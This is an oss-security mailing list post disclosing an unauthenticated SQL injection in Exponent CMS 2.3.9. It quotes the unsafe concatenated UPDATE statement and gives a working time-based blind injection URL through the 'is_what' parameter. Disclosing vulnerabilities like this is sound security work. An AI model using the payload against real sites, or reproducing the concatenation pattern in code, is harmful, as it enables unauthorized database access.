Date: Mon, 19 Sep 2016 13:46:34 +0800 From: east wu <ylgaaaaa@...il.com> To: oss-security@...ts.openwall.com Cc: cve-assign@...re.org Subject: Exponent CMS 2.3.9 SQL injection vulnerabilities https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/ addressbook/controllers/addressController.php#L172 'is_what' parameter there is an injection without login https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559 $this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE " . $where); POC: /index.php?controller=address&action=activate_address&is_what=address1=(select * from (select sleep(5))x)%23&id=1
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ